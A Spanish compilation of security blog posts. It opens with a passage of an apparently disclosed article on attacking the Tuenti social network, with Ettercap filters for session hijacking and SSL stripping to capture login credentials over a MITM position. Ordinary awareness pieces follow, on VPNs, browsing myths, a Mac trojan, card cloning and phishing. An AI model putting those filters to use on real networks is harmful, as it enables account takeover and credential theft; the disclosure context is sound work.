Como apunte final, simplemente decir que en todas las peticiones que modifican información (todos los ‘POST’) ha de enviarse el CSFR.

¿Qué medida va a tomar Tuenti al respecto?

Pues Tuenti pretende introducir un sistema de firmado de peticiones a través de un token secreto intercambiado por SSL en el inicio de sesión y que no saldría del navegador (incrustado en la página o en una cookie que solo se enviaría en conexiones cifradas).

De ésta forma, junto con un timestamp que se enviaría para darle caducidad a las peticiones y evitar su duplicado, se evitaría que se pudiesen hacer peticiones al servidor sin dicho token.

¿Cómo podríamos obtener ese token secreto?

En principio, bastaría con modificar el HTML que le llega al usuario y hacer que en cualquiera de los formularios del mismo se envíe el mismo token que se utiliza para firmar. Aun así, habría que ver la implantación del mismo.

En la aplicación que se adjunta al artículo podéis ver otras acciones como cerrar la sesión, cambiar el estado, modificar la página web y números de teléfono (los demás campos de la información personal), etc.

2. Robando una sesión

Todo lo que se ha contado es aplicable siempre y cuando el usuario no decida cerrar la sesión, pues entonces el SID quedaría invalidado y no podríamos realizar ninguna acción sobre su cuenta, pero… ¿qué ocurriría si pudiésemos obtener una sesión, de forma transparente al usuario, y que éste no pueda cerrarla? Pues en ese caso tendríamos acceso completo a la cuenta y el usuario no podría hacer nada.

Es cierto que Tuenti establece un límite máximo de cinco SIDs válidos por cuenta/servicio (es decir, la versión normal y la móvil son independientes) y si la víctima abriese cinco cuentas al mismo tiempo nuestro SID quedaría invalidado pero es poco probable pues no es un dato que se conozca además de que el ataque se habría realizado de forma (casi) transparente.

¿Cuál sería el procedimiento?

Este ataque es muy fácil de llevar a cabo. Bastaría con bloquear el envío del SID de la víctima al servidor, de ésta forma éste creería que el usuario no está autenticado y le enviaría la página de login. La víctima se reautenticaría (sería extraño que se diera cuenta de que está siendo atacada pues tampoco es una situación anómala) y generaría un nuevo SID en el servidor. Si tras la reautenticación levantamos el bloqueo y le dejamos seguir operando con el SID antiguo, es decir, modificamos en la cabecera (en Set-Cookie) del paquete de respuesta el contenido de la cookie SID introduciendo el antiguo y nosotros nos quedamos con el nuevo, tendremos acceso a la cuenta de la víctima (tenemos un SID válido) sin que ésta pueda actuar al respecto.

Para realizar el bloqueo, podemos utilizar los filtros de Ettercap. Bastaría con modificar el contenido de la cookie SID. El filtro podría ser así.

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “sid=”)) { replace(“sid=”, “sid=0”); }
}

A pesar de que podríamos utilizar el Ettercap, yo recomendaría realizar una aplicación propia para el MITM para poder tener mayor control del tráfico antes de que éste se envíe a la víctima. De ésta forma podríamos crear un filtro más personalizado y no estar atados a las opciones que nos da el Ettercap. En el código adjunto al artículo se puede consultar la clase MITM para realizar el ataque desde Java.

¿Qué medida va a tomar Tuenti al respecto?

La medida que va a tomar Tuenti al respecto es el implantar un sistema de control de sesiones (similar al que tenemos, por ejemplo, en Gmail). Es verdad que si el atacante tiene acceso a la cuenta puede monitorizar este servicio y cerrar cada sesión generada por el usuario (bloqueándole el acceso a su cuenta), por lo que la idea es solicitar la contraseña cada vez que se vaya a cerrar una sesión (en todo el ataque no hemos obtenido los credenciales de usuario pues la idea es que el proceso sea lo más transparente posible y, a pesar de que la mayoría aceptaría un certificado falso sin fijarse, es demasiado “cantoso”).

3. Obteniendo los credenciales

Por desgracia es extremadamente sencillo. Bastaría con aprovechar que el “login page” no se cifra, para modificar el formulario de autenticación para que realice la petición sin SSL, obteniendo los credenciales en texto plano.

¿Cómo podríamos modificar el “login page”?

Como estamos realizando un ataque MITM y el tráfico no está cifrado, no sólo podemos monitorizarlo sino también alterarlo, por lo que podríamos utilizar un filtro de Ettercap que se encargue de realizar el proceso, bastando con reemplazar ‘https’ por ‘http’ en el action del formulario. El filtro podría ser así:

if (ip.proto == TCP && tcp.src == 80) {
replace(“action=\”https”, “action=\”http”);
}

Otra opción podría ser la utilización de la aplicación SSLStrip.

¿Qué medida va a tomar Tuenti al respecto?

Para evitar el robo de credenciales Tuenti tiene previsto cifrar por completo (no solo el envió de los credenciales) el ‘login page’ para evitar su manipulación.

Aun así, es necesario concienciar al usuario de que el login ha de hacerse siempre por medio de una conexión segura, es decir, fijarse si estamos a través de SSL y que además el certificado es de Tuenti. Esto es importante porque sino el atacante, por ejemplo, puede obtener el ‘login page’ por SSL y brindárselo a la víctima sin cifrar, obteniendo los credenciales en texto plano.

Como apunte final, decir que actualmente la contraseña se envía tal cual, y como medida complementaria Tuenti pretende utilizar un token para la autenticación que se enviaría junto con el correo electrónico y cuya estructura sería:

token auth = token secreto + hash(contraseña)

¡Hasta aquí todo! Ya para terminar…

Simplemente decir que el artículo (comunicado hace meses) ha servido para que Tuenti implante (en principio se dijo a medio plazo, pero ahora me entra la duda de que vayan a tomar verdaderamente medidas al respecto) una serie de medidas de seguridad que nos benefician a todos los usuarios.

La mejor medida sería que toda la red social se ofreciera por SSL, opcionalmente al menos (independientemente de la complejidad que conllevara, hay que tener en cuenta los datos tan privados contenidos en la red social). Aun así al parecer (no lo digo yo ni significa que lo comparta) la infraestructura actual de Tuenti no lo soportaría (debido al sistema de balanceo que tienen implementado) además de que la experiencia de usuario se vería afectada en gran medida (ralentización).

Y con respecto a la aplicación…

Se han modificado muchas de las ideas que lancé al publicarlo. Por ejemplo, ahora ya podemos empezar a realizar acciones sobre la cuenta de la víctima esté ésta en el TuentiChat o no (como comentaba, lo importante es el SID). Además, se ha modificado el sistema de peticiones pues dejó de funcionar.

Además, se han realizado muchos cambios internos, por lo que os animo a echarle un vistazo al código (no solo compilarlo y ponerse a probar todo lo que se ha dicho en este artículo).

Muchas personas me han pedido que se publique, además del código, una versión ya compilada y lista para usarse. No lo voy a hacer pues es inmediato (puedes incluso abrir el proyecto desde un IDE y compilarlo con un click) y si uno no es capaz de hacer esa tarea tan sencilla es mejor no darle todo hecho…

Nombre: aplicacion_src.7z
CRC-32: f0bb0406
MD5: 919d2ac7b9e13c06c96784f52f38c492
SHA-1: 5ca1691308d7411fe6685f32fe25ad6d37508c15

Artículo cortesía de: Luis Delgado J.


Security

10 pasos para implementar seguridad en la empresa

Según un estudio realizado recientemente por INTECO, 8 de cada 10 equipos se encuentran infectados con algún tipo de código malicioso. Ante estos datos tan alarmantes, Microsoft ha elaborado una Guía de Seguridad que intenta describir los pasos prioritarios que una empresa debe implementar para proteger su entorno.
Es necesario incidir en la necesidad de un cambio de concepción, que conlleva al empleo de medidas reactivas a proactivas en la gestión de la seguridad. Las medidas reactivas son soluciones parciales, medidas de protección implementadas sin apenas intervención del usuario, que básicamente consisten en “la instalación del producto” sin un seguimiento y control continuado.

Si desea evaluar los puntos débiles de su entorno de seguridad de IT puede usar la herramienta gratuita de Evaluación de Seguridad de Microsoft (MSAT), diseñada para ayudar a las organizaciones de menos de 1.000 empleados.

Fuente: Microsoftwww.segu-info.com.ar


Denken Uber

Como protegerte de Firesheep

from Denken Über by mariano 

2 people liked this – you, and 1 more

Hace apenas 4 días publiqué una nota sobre Firesheep y el add-on ya fué descargado más de 250.000 veces.

No creo en el concepto de seguridad por oscuridad donde se maneja todo en silencio hasta que haya una solución porque los que viven del hacking cononcen estos problemas pero ni al publicarlo creí que iba a despegar así…. y teniendo en cuenta que el concepto de WIFI gratis y sin clave es mucho más común en Argentina que en el resto del mundo, sólo les recomiendo esto: Usen un servicio de VPN.

¿Si uso un VPN el problema de seguridad desaparece? NO que quede claro que no desaparece sino que simplemente cambiás el punto débil de la cadena de “los paquetes que salen de tu PC” a “los paquetes que salen del servidor seguro hacia el servicio que estás accediendo”.

¿Que servicios de VPN hay en el mercado? De forma gratuita les recomiendo usar Hotspot Shield que es algo de buen nivel y gratis… y la verdad excepto el bannercito molesto que aparece cuando navegás un sitio desde una red WIFI abierta es la mejor elección que hay 🙂

Yo personalmente uso y recomiendo StrongVPN luego del problema del hack que sufrió @cvander y que básicamente lo uso porque el servidor seguro es confiable.

¿Que gano y que pierdo usando una VPN? Siendo honesto, si NO usás hotspots abiertos y tu router está asegurado, no deberías tener problemas porque nadie puede entrar entre tu “máquina” y tu “router” pero si sos de ir a bares/aeropuertos o lugares donde no controlás vos tu seguridad…. el VPN es la mejor forma de evitar un problema, pero repito: esto no evita que exista el mismo

Mientras tanto… piensen si vale la pena o no proteger sus datos porque estoy seguro valen algo 😉

Tip: sirven para iPhone y Android 🙂


Mitos…

Mitos y recomendaciones para una navegación web segura a día de hoy

Os dejamos a continuación una serie de consejos para poder llevar a cabo una navegación web segura así como los 10 mitos sobre la seguridad en Internet. Muchos usuarios no conocen si navegan de forma segura, no saben evitar los sitios peligrosos, no utilizan una política sólida de acceso a Internet ni utilizan un navegador seguro, o no cuentan con la experiencia suficiente para reconocer un sitio peligroso con tan sólo verlo. Con que una sola de estas condiciones se cumpla, ya debería ser consciente de que se encuentra en un grave peligro.

Además, a pesar de encontrarnos en el siglo XXI, todavía están generalizados una serie de mitos sobre la seguridad en Internet que Sophos ha resumido en un informe y a los que ofrece la respuesta definitiva”,comenta Pablo Teijeira, Corporate Account Manager de Sophos Iberia. Los 10 mitos sobre la navegación segura por Internet:

Mito 1: Internet es seguro porque no he sufrido nunca una infección por malware.
Esta idea está muy extendida, aunque lo que puede ocurrir en realidad es que el usuario no sea consciente de que ya está infectado. Muchos ataques provocados por los programas maliciosos están diseñados para robar información personal y contraseñas, o para utilizar el equipo para distribuir correo no deseado, malware o contenido inapropiado sin que el usuario sea consciente de ello.

Mito 2: Mis usuarios no pierden el tiempo navegando por contenidos inapropiados.
Más del 40% del uso de Internet en entornos corporativos es inapropiado y no se comprueba, lo que equivale a una media de 1 a 2 horas por día y usuario. Además, el número de casos de adicción a Internet va en aumento, y los cálculos actuales indican que hasta entre un 5 y 10% de los usuarios de la Red de redes, sufren algún tipo de dependencia de la web.

Mito 3: Controlamos el uso de Internet y nuestros usuarios no pueden evitar esta política.
Gracias a los servidores proxy anónimos, para los empleados es muy fácil eludir la política de filtrado web y visitar cualquier sitio que quieran.

Mito 4: Los únicos sitios que son peligrosos son los de pornografía, juegos de azar y otras páginas “raras”.
Las páginas de confianza que han sido secuestradas representan más del 83% de los sitios que alojan programas maliciosos. La mayoría de los sitios infectados son páginas web en las que el usuario confía y, de hecho, puede que visite diariamente y que son secuestradas para la distribución de malware.

Mito 5: Sólo los usuarios ingenuos son víctimas de infecciones causadas por el malware y virus.
Los programas maliciosos procedentes de descargas no autorizadas se activan de forma automática sin ninguna acción por parte del usuario que no sea, simplemente, visitar ese sitio.

Mito 6: Sólo se puede ser víctima de infecciones si se descargan archivos.
Actualmente la mayoría de infecciones provocadas por el malware se producen mediante una descarga no autorizada. El código malicioso se puede encontrar oculto en el contenido de la página web y descargarse y ejecutarse de manera automática en el navegador con el simple hecho de visitar la web en cuestión.

Mito 7: Firefox es más seguro que Internet Explorer.
Todos los navegadores están expuestos a los mismos riesgos porque, básicamente, todos ellos, son un entorno de ejecución de JavaScript, que es el lenguaje de programación que se usa en Internet y que, por tanto, utilizan los creadores de malware. Además, muchos ataques van dirigidos a complementos que se utilizan en todos los navegadores, como por ejemplo, Adobe Acrobat.

Mito 8: Cuando aparece el icono de candado en el navegador, es seguro.
El icono de candado indica que hay una conexión cifrada con SSL entre el navegador y el servidor, pero no ofrece ningún tipo de seguridad contra el malware.

Mito 9: La seguridad en Internet obliga a hacer un sacrificio entre seguridad y libertad.
A pesar de que Internet se ha convertido en una herramienta vital para muchas funciones empresariales no hay ninguna necesidad de sacrificar el acceso o la seguridad. Una solución de seguridad en Internet ofrece la libertad de conceder acceso a los sitios que los usuarios necesitan al tiempo que se protege la empresa.

Mito 10: Las soluciones de seguridad para estaciones de trabajo no pueden ofrecer protección contra las amenazas de Internet.
En esencia, el navegador de Internet es su propio entorno de ejecución: descarga contenido, lo genera y ejecuta scripts, y todo ello sin ninguna visibilidad por parte de productos de seguridad para estaciones de trabajo. No obstante, esto está cambiando, y se está abriendo todo un nuevo enfoque a la seguridad en Internet, sobre todo para trabajadores móviles que realizan sus tareas fuera de los límites tradicionales de las redes corporativas.

Cinco consejos definitivos para hacer frente a las amenazas web modernas

La educación y la concienciación de los usuarios, medidas preventivas y una solución moderna de seguridad en Internet son componentes integrales de una defensa completa con las amenazas web actuales. Desde MuySeguridad.net corroboramos los consejos de Sophos, que:

  • Se mantengan los sistemas actualizados y con todos los parches instalados.Una de las mejores maneras de hacerlo es mantener activada la función de actualización automática.
  • Se estandarice el software web. Se puede reducir de forma drástica la exposición a riesgos mediante la limitación o la estandarización de un conjunto básico de aplicaciones para interactuar con Internet: navegador, lector .pdf, reproductor multimedia, etc.
  • Se protejan los navegadores. Se debe familiarizar con los parámetros de seguridad, privacidad y contenido presentes en todos los navegadores. Algunos supondrán una molestia sin aumentar la seguridad, mientras que otros son importantes para limitar los ataques y amenazas.
  • Se aplique una política sólida de contraseñas. Una política eficaz consiste en hacer que nos e puedan adivinar ni descifrar fácilmente las contraseñas. Es importante que éstas sean largas, que incluyan números, símbolos y caracteres en mayúscula y minúscula, sin información personal y cambiarlas con frecuencia.
  • Se utilice una solución de seguridad eficaz para Internet. Una solución de seguridad adecuada reduce la exposición a las amenazas, protege contra sitios de confianza que pueden ser objetos de secuestros, y ayuda a proteger los recursos contra los abusos provocados por el intercambio de contenidos ilegales o la transferencia de contenido multimedia.

Autor: Jesús Maturana
Fuente: Muy Seguridad.net


Fabric program

Fabric, lenguaje de programación seguro: crea seguridad autónoma según se está escribiendo un programa

Hasta el momento la gran mayoría de sistemas de seguridad eran reactivos, es decir, no se implementaban hasta que el sistema o programa había sido vulnerado, como parte de una reacción a dicho ataque. Sin embargo la creación de Fabric, un lenguaje de programación nacido como extensión de Java va a cambiar ese concepto radicalmente

El experto de seguridad Fred Schneider ha confirmado que el desarrollo de investigadores de Cornell conocido como Fabric, extensión al lenguaje de programación Java que crea sistemas de seguridad en un programa según se escribe.

Fabric está diseñado para crear sistemas seguros para computación distribuida donde los nodos interconectados no tienen por qué ser confiables. Estamos hablando de sistemas que mueven dinero, o bien hospedan historiales médicos.

En Fabric, todo es un “objeto” etiquetado con una serie de permisos sobre cómo y quien puede acceder a ello y también qué acciones pueden realizar. Incluso los bloques del código del programa tienen políticas integradas de uso sobre cuando y dónde pueden ejecutarse.

El compilador refuerza sobremanera las políticas de seguridad y no permite al programador escribir código no-seguro (PDF).

Si queréis echar un ojo a Fabric, su versión inicial ha sido liberada en la web de Cornell.

Autor: Jesús Maturana
Fuente: Muy Seguridad.Net


Security Bloggers:)

Bloggers y seguridad

En muchas ocasiones, cuando te mueves mucho en un determinado ‘mundillo’, tratas a gente con inquietudes similares, lees blogs sobre esa temática, se crea un estado de conciencia en el cual se asumen como naturales y ‘conocidos por todo el mundo’ conceptos que probablemente no estén tan ampliamente difundidos. Al hilo de esto se nos ha ocurrido la idea de entrevistar a unos cuantos bloggers bastante conocidos, autores de blogs relacionados con la tecnología (en un plano mas general) para ‘medir’ cuanto de lo que para nosotros es ‘el día a día’ realmente tiene calado fuera de este ambiente.
Agradecemos infinitamente el tiempo que nos han dedicado:
1- Cada vez parece que la seguridad informática va tomando mas minutos de los medios tradicionales (televisión, prensa, etc) y mas a raíz del famoso ‘Caso Aurora’ de Google. ¿En vuestras fuentes diarias de información seguís algún sitio relacionado con seguridad o solo os llegan noticias en medios mas generalistas? (tipo Barrapunto, Digg …)
Antonio Ortiz:  En mi caso sigo algunos blogs, leo SBD claro, pero también ojeo a Sergio Hernando y a Chema Alonso alguna vez y también a  Schneier. El caso es que la mayoría de las veces quien sabe de seguridad aborda el tema desde el punto de vista técnico y eso, como se suele decir, “me pilla lejos” después de varios sin ejercer de “informático”.

El blog de Inteco podría ser una alternativa a este escenario pero creo que le falta el empuje que sí le dan otras instituciones como la CMT

Enrique Dans: Lo más especializado que sigo en ese sentido es a Bruce Schneider, que me parece una especie de profeta de dios en la tierra para muchas cosas. De todo lo demás relacionado con la seguridad me suelo enterar a través de páginas de esas que tú consideras generalistas (la palabra “generalista” está cambiando mucho su significado últimamente, va a ser que somos muy friquis 🙂 tales como Slashdot, Boing Boing, Digg o The Register.

Fernando Tellado: Sigo muchas fuentes y, aunque no soy técnico, estoy obligado a informarme acerca de seguridad informática. De hecho, este mismo mes de agosto tuvimos un ataque en Medios y Redes con un script a nuestro OpenX y nos vimos obligados a revisar aspectos del adserver del que no teníamos demasiada información, afortunadamente el equipo técnico lo detectó en seguida y en tiempo record estuvo solucionado, así que puedes ver que tenemos que estar siempre al día.

Como te decía, en mi caso leo a diario OpenSecurity, Security by Default y estoy suscrito a Hispasec hace años. Además, también informan sobre seguridad informática en medios tecnológicos más generalistas que suelo leer, como TechCrunch o Boing Boing.

2- Vosotros que sois gente amante del ‘siempre conectado’ que viajáis mucho y por ende os habréis conectado en Wifis compartidas, servicios de Internet de hoteles y probablemente en otros mil sitios potencialmente hostiles … ¿ Tenéis conciencia de que realmente cada vez que actualizáis Twitter, Facebook, usáis Skype, el sujeto que está a pocos metros de vosotros podría tener acceso a vuestras credenciales ? ¿Tenéis la constancia de que existen herramientas bastante fáciles de usar para hacer realmente verdaderos desastres ? En definitiva: ¿Cual es vuestro grado de paranoia al respecto y que precauciones tomáis?
Antonio Ortiz: Mi grado de paranoia es moderado. Llevo 3g cuando el evento es en España y siempre prefiero utilizarlo frente a la Wifi. Cuando no es posible tirar de 3g me decanto por intentar ser razonablemente prudente: correo con conexión segura y servicios con muy poco riesgo de pérdida de datos (ej, comentario en páginas y similares). En general creo que la conciencia de peligro en estas situaciones del usuario medio es nula.

Enrique Dans: Ninguno. Soy lo menos paranoico del mundo. No me considero un objetivo interesante: no manejo información especialmente sensible, no hago transacciones demasiado importantes, procuro ser totalmente transparente en prácticamente todo lo que hago, y cuando he tenido algún problema de seguridad, el banco se ha encargado de todo con total eficiencia y sin ningún trastorno. No apunto mis contraseñas en un post-it ni las transmito en claro, pero si alguien quiere entrar en mi ordenador o en alguna de mis cuentas, supongo que – como bien sabéis – podría hacerlo sin demasiados esfuerzos, no soy ningún “reto” en ese sentido. ¿Precauciones? Dejando aparte el procurar generar contraseñas razonablemente robustas y el no usar la misma para todo, poquito más.

Fernando Tellado: Miedo me acabas de dar JAJA. En serio, tengo que reconocer que no soy muy paranoico con la seguridad personal cuando utilizo servicios sociales como los que citas, pero no por irresponsabilidad sino porque uso las redes sociales de manera personal, sin compartir nunca información sensible. Si soy bastante más precavido con respecto al uso del e-mail, donde si tengo comunicaciones sensibles. A este respecto nunca abro el correo en redes abiertas, no utilizo Webmails para correos de trabajo y cambio bastante a menudo las contraseñas, procurando que no sean fácilmente detectables. El único servicio que has citado que utilizo de manera laboral, Skype, nunca lo utilizo en redes abiertas tampoco.

Seguramente sean pocas precauciones, y espero que después de la entrevista me des algunos consejos a este respecto, y a todos los lectores claro.

3- Todos en mayor o menor medida hemos sufrido la acción de un virus / troyano / robo de contraseña. ¿Cual ha sido vuestra experiencia mas traumática?
Antonio Ortiz: En los tiempos de Windows 98, si no recuerdo mal, aquél tan simpático que te reiniciaba cada minuto. Blaster se llamaba el amigo. Pero vamos, nada que un par de búsquedas en la web no arreglaran.

Enrique Dans: Mi experiencia más traumática vino precisamente de un intento de protegerme ante problemas: me había instalado un software que permitía la recuperación del sistema en caso de problemas. No recuerdo fabricante ni nombre, de esto hace como dieciséis o diecisiete años, pero calculo que sería como un precursor de lo que hoy en día es Time Machine, un backup y un log. Varios meses después, por error, activé el programa y “mágicamente” (o mejor, “estúpidamente”) trasladé mi sistema a varios meses antes, con la consiguiente pérdida del trabajo que había hecho durante aquellos meses. Recuerdo con auténticos sudores fríos aquella noche recuperando presentaciones que tenía en otros ordenadores, textos y sobre todo, las hojas de cálculo con los escenarios de una valoración financiera que llevaba mes y pico haciendo con un profesor de finanzas al que le tenía un particular respeto como si fuera una auténtica pesadilla.

Fernando Tellado: Personalmente tengo que reconocer que he tenido mucha suerte (supongo que debe ser suerte) pues nunca he sufrido ninguna experiencia de este tipo. Desde hace ya casi 20 años que no utilizo sistemas de escritorio basados en Windows, sustituyéndolos, primero por Linux y desde hace 8 años por Mac OSX, algo que creo que ha ayudado a evitar bastantes problemas.

En cuanto a los blogs y webs propias procuro alojarlos siempre en hostings que me den garantías en este sentido, aunque cuesten un poco más, y en las de la empresa es una obligación, para con nosotros y para con nuestros clientes. También, al igual que con el e-mail, procuro cambiar bastante a menudo de contraseña y, en concreto en WordPress – software de publicación que uso habitualmente – trato de tener siempre actualizado el sistema e informado de cualquier posible vulnerabilidad. No obstante, y como ya te he comentado en la primera pregunta, a veces no puedes evitar ataques, y lo que toca es apoyarte en un buen equipo técnico que, afortunadamente tenemos.

4- La última pregunta, tipo examen. Sin hacer uso de google / wikipedia, como de familiares os resultan los siguientes términos: ‘XSS’ ‘WAF’ ‘Format String’ ‘Ring0’
Antonio Ortiz: ¿De verdad me vais a obligar a recuperar los apuntes de Redes y de seguridad de la información? Tengo que confesar que sólo controlo XSS y que el resto me temo que tendría que pedir ayuda. El camino hacia el tecnicoless es lo que tiene


Enrique Dans: Hombre, familiaridad sí, no es lo mismo que si me hablas en swahili. Sé lo que son, aunque con un nivel mínimo de profundidad. Usaría un XSS o un Format string para atacarte, un WAF para defenderme, y no te tocaría el ring 0 a no ser que tuviésemos ya mucha confianza 🙂 Decididamente, no aprobaría sin estudiar un examen mínimamente serio que me preguntase sobre sus definiciones.
Fernando Tellado: Pues si te soy sincero solo conozco el primero, el Cross Site Scripting, pues he publicado algunos artículos en Ayuda WordPress sobre este tipo de ataques en WordPress y como tratar de evitarlos, del resto ni idea. Lo del WAF me suena a un rollo muy “geek”, una acepción que se refería a la aceptación de las esposas a que el marido estuviera siempre comprando los últimos cacharritos (por Wife affectance facto) pero seguro que no es eso 😀
Muchísimas gracias por vuestro tiempo !

Alerta de seguridad: Nuevo troyano boonana al ataque.

trojanhorse Alerta de seguridad: Nuevo troyano boonana al ataque, Review

Algunos genios de la seguridad desde hace mucho tiempo tienen la teoría de que cuanto más popular se hace el Mac mas rápido empezamos a ver malware para el. Efectivamente, durante todo el día de ayer se recibieron noticias por correos electrónicos de empresas de relaciones públicas informando de algunos troyanos que están afectando a los usuarios de Mac.

Este troyano ha sido reportado por Securemac.com, quienes han comunicado la aparición de este programa llamado trojan.osx.boonana.a que, aunque usa código multiplataforma parece estar diseñado para atacar a los Mac y crear fallos de seguridad en el sistema que permiten acceder a cualquier intruso a nuestro sistema sin nuestro consentimiento.

Las notas de prensa de SecureMac indican que el “componente de Java del caballo de Troya es multiplataforma”, pero no está claro que otros de sus componentes sean capaces de funcionar en Mac OS X.

A continuación, Intego informó de que un troyano de Java similar conocido como Koobface.A también se esta propagando a través de redes sociales como Facebook y Twitter.

SIGUE LEYENDO el resto después del salto.

 

Intego informa que estos troyanos harán saltar varias advertencias, como la alerta estándar de seguridad de Java de Mac OS X. Si no estáis esperando que un applet de Java se ejecute en vuestra máquina, hacer clic en el botón Denegar y el applet no se ejecutará. Si desea obtener más información acerca de lo que está pasando, haga clic en el botón Mostrar detalles, y verás el contenido con un certificado root que quiere ejecutarse en vuestro equipo. Al hacer clic en Denegar estáis protegiendo vuestro equipo contra una posible infección de malware. Al permitir que se ejecute el applet de Java se pondrá en marcha un programa de instalación que se mostrará en la máquina. Si no habéis puesto en marcha deliberadamente un instalador, entonces empezar a rezar.

Si bien no se sabe hasta qué punto son peligrosos éstos troyanos para las maquinas con Mac OS X, recomendamos a todo el mundo que preste atención a lo que sucede en su Mac y use el sentido común al utilizar sitios de redes sociales.

Por lo tanto, no confiéis en correos de personas desconocidas o con contenido extraño proveniente de una cuenta supuestamente conocida, y jamas ejecutéis ningún programa que no sepáis a ciencia cierta qué va a hacer, y menos aun introducir la clave de administrador si nos la piden. En la gran mayoría de las ocasiones, ningún programa pedirá la clave de administrador, sólo lo harán los instaladores de programas.

Fuente: Tuaw.com


Clonación de tarjetas de crédito y débito

Clonación de tarjetas de crédito y débito: “Abg. Andrés J. Hernández O.

Se aproximan los meses donde las personas hacen uso constante de sus tarjetas de debito y crédito en vistas de los gastos que representan los preparativos navideños además de los regalos correspondientes, y es por ello que considero oportuno alertar a los ciudadanía en tener mucha precaución al momento de utilizar este instrumento de pago, en vista de que estos meses es donde mayormente ocurren los casos de clonación de tarjetas de debito y crédito.
Existen muchas formas de combatir este flagelo, y una de ellas es a través de la capacitación de la sociedad, lo cual es fundamental conocer el modus operandi de esta práctica para así poder evitar caer en ella.
La clonación puede darse en diferentes formas y sitios, entre los más comunes tenernos: En las tiendas o comercios, que es donde generalmente operan estas bandas en complicidad con los dueños o empleados, utilizan un dispositivo electrónico conocido como “Pescadora” o “Skimmer”, el cual se encarga de copiar los datos de la banda magnética de la tarjeta, resultando casi imperceptible para los tarjetahabientes por las similitudes de estos dispositivos con los que suministra las entidades financieras. Estos dispositivos tienen una capacidad de almacenamiento de hasta 100 tarjetas. Una vez obtenidos los datos de las tarjetas, estos son descargados a un equipo de informático, el cual a través de un software manipulan la data obtenida para luego transferirla a la tarjeta virgen y así crear la tarjeta clonada.

Este practica no solo afecta a los clientes de las entidades financieras, también hace daño a la imagen o credibilidad de estos bancos, los cuales hay que reconocer están haciendo grandes esfuerzos en materia de seguridad para aplacar este delito, sin embargo no hay que olvidar que los usuarios también tienen su cuota de responsabilidad en cuanto a la seguridad de sus tarjetas.

Recomendamos a los tarjetahabiente tener en cuenta los siguientes consejos, a los fines de evitar ser víctimas de este delito:

  • Nunca perder de vista su tarjeta al momento de realizar algún pago.
  • Siempre verificar que los puntos de venta estén en lugares visibles y de fácil alcance para el usuario.
  • Afiliarse a los sistemas de notificación por Mensajes de texto (SMS), ya que le permite tener información inmediata de las operaciones que realice con la tarjeta (no todos los bancos utilizan estos sistemas, aún cuando debe ser obligatorio para todos).
  • Cambiar su contraseña o PIN de manera periódica (recomendable cada 15 días).
  • Revisar diariamente sus estados de cuenta.
  • Si sospecha que su tarjeta fue clonada, inmediatamente ponerse en contacto con su banco solicitando el bloqueo de su tarjeta.

Otra de las formulas o modus operandi utilizadas por estos grupos delictivos, se basa en la alteración de los Cajeros Automáticos (ATM), donde son sustituidas piezas esenciales como la ranura de la tarjeta, que es cambiada por una “pescadora” o “skimmer”, así como también la pantalla o monitor, igualmente se conocen casos donde colocan cámaras ocultas con la finalidad de grabar cuando el usuario coloca la contraseña.

Consejos:

  • Al momento de colocar su clave, cubrir con su mano el teclado numérico.
  • Si observa alteraciones inusuales en los cajeros automáticos, abstenerse de utilizarlo.
  • Nunca permita que un extraño lo/a ayude a utilizar el cajero automático.
  • Si observa alguna alteración de un cajero automático, denunciarlo inmediatamente ante los cuerpos de seguridad.

Fraude Moderno (PHISHING)

Los grupos criminales nunca descansan, siempre están en busca de mejorar sus métodos, y las TIC (Tecnologías de Información y Comunicación) se han vuelto una herramienta importante para sus actividades ilícitas.
El Phishing, es una técnica de engaño basada en el envío masivo de correos electrónicos, fingiendo ser de entidades bancarias, con la finalidad de obtener información de sus víctimas, como números de tarjetas, claves, números de cuentas, entre otros.

Modus Operandi

Las bandas que operan bajo esta modalidad, envían masivamente correos electrónicos simulando ser de entidades bancarias, donde invitan a la victima hacer click en un enlace que lo redirecciona a una página web FALSA del banco, para luego solicitarle información bancaria personal supuestamente por razones de seguridad, mantenimiento o cualquier otra excusa. Son muchas las personas que caen en esta trampa y terminan proporcionando sus datos a los delincuentes, ya que estas páginas web falsas están muy bien diseñadas y sus diferencias con la web oficial del banco no son fácilmente detectadas por las víctimas. Es importante recordar que esta técnica se complementa con otra conocida como Ingeniería Social.
Otras de las formas como puede operar esta técnica, es a través del envío de Mensajes de Texto (SMS) o por medio de llamadas telefónicas.

Consejos útiles:

  • NUNCA responda correos electrónicos o Mensajes de Texto donde le solicite información personal o bancaria. Recuerde siempre que su banco nunca solicita información vía e-mail o SMS.
  • NUNCA acceder al portal de su banco por medio de enlace o link, siempre teclear la dirección web directamente en su navegador.
  • No es recomendable acceder a la página web de su banco desde sitios de conexión públicos o cibercafés.
  • Verificar siempre al conectarse al portal del banco, que en la barra de direcciones aparezca la expresión “https”, esto significa que la comunicación con el banco esta encriptada.
  • Es recomendable tener instalado algún programa anti-phishing, trabajan como complementos de seguridad para los navegadores.

SUDEBAN ataca la clonación de tarjetas

La Superintendencia de Bancos y Otras Instituciones Financieras, como ente supervisor de las entidades bancarias en el país, ha venido desarrollando un conjunto de planes con la finalidad de aplacar el delito de clonación de tarjetas, entre los cuales podemos nombrar: 1) La utilización del chip en tarjetas de debito y crédito. 2) La utilización de los puntos de venta inalámbricos. 3) La Pantalla Unificada de cajeros automáticos, entre otros.
Igualmente SUDEBAN, mantiene una supervisión constante a las entidades bancarias, a lo fines de comprobar el cumplimiento de las normativas emanadas de éste, y así garantizar el resguardo de los ahorros de todos los venezolanos.
Es importante recordar la vigencia de la Ley de Tarjetas de Crédito, Débito, Prepagadas y demás tarjetas de financiamiento o pago electrónico, donde se desarrollan las normativas sobre las cuales debe operar una entidad bancaria en relación con las tarjetas de crédito y debito, así como también regular las relaciones entre el emisor, el tarjetahabiente y el comercio afiliado, con el objeto de garantizar el respeto y protección de los usuarios, además establece las obligaciones de las entidades bancarias en materia de seguridad y los deberes de los tarjetahabientes.
En cuanto al delito de Clonación de Tarjetas de Debito y Crédito, está tipificado en el Art. 16 de la Ley especial Contra los Delitos Informáticos, con una sanción binaria de 5 a 10 años de prisión y multa de 500 a 1.000 U.T.

Fuente: Blog de Andrés Hernández


Principales errores garrafales de seguridad

Principales errores garrafales de seguridad: “El tema de la seguridad de TI ahora es más importante que nunca. Y no sorprende. Al crecer nuestra dependencia de la tecnología, también crecen los incidentes de seguridad. Según un estudio reciente de PricewaterhouseCoopers, el 90% de los consultados de organizaciones grandes reportaron al menos un incidente de seguridad malintencionado en el último año. La cantidad promedio de incidentes por persona consultada, sin embargo, fue de 45.
